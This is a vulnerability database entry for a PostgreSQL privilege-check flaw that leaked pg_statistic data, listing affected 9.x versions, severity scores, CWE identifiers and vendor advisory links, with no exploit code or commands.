Description
It was found that some selectivity estimation functions in PostgreSQL before 9.2.21, 9.3.x before 9.3.17, 9.4.x before 9.4.12, 9.5.x before 9.5.7, and 9.6.x before 9.6.3 did not check user privileges before providing information from pg_statistic, possibly leaking information. An unprivileged attacker could use this flaw to steal some information from tables they are otherwise not allowed to access.
References (10)
Core 10
Core References
Third Party Advisory, VDB Entry vdb-entry
x_refsource_sectrack
http://www.securitytracker.com/id/1038476
Third Party Advisory vendor-advisory
x_refsource_debian
http://www.debian.org/security/2017/dsa-3851
Vendor Advisory vendor-advisory
x_refsource_redhat
https://access.redhat.com/errata/RHSA-2017:2425
Vendor Advisory vendor-advisory
x_refsource_redhat
https://access.redhat.com/errata/RHSA-2017:1678
Vendor Advisory vendor-advisory
x_refsource_redhat
https://access.redhat.com/errata/RHSA-2017:1677
Vendor Advisory vendor-advisory
x_refsource_redhat
https://access.redhat.com/errata/RHSA-2017:1983
Vendor Advisory x_refsource_confirm
https://www.postgresql.org/about/news/1746/
Vendor Advisory vendor-advisory
x_refsource_redhat
https://access.redhat.com/errata/RHSA-2017:1838
Third Party Advisory, VDB Entry vdb-entry
x_refsource_bid
http://www.securityfocus.com/bid/98459
Third Party Advisory vendor-advisory
x_refsource_gentoo
https://security.gentoo.org/glsa/201710-06
Scores
CVSS v3
7.5
EPSS
0.0129
EPSS Percentile
79.9%
Attack Vector
NETWORK
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
Details
CWE
CWE-200
CWE-285
Status
published
Products (41)
postgresql/postgresql
9.3
postgresql/postgresql
9.3.1
postgresql/postgresql
9.3.2
postgresql/postgresql
9.3.3
postgresql/postgresql
9.3.4
postgresql/postgresql
9.3.5
postgresql/postgresql
9.3.6
postgresql/postgresql
9.3.7
postgresql/postgresql
9.3.8
postgresql/postgresql
9.3.9
... and 31 more
Published
May 12, 2017
Tracked Since
Feb 18, 2026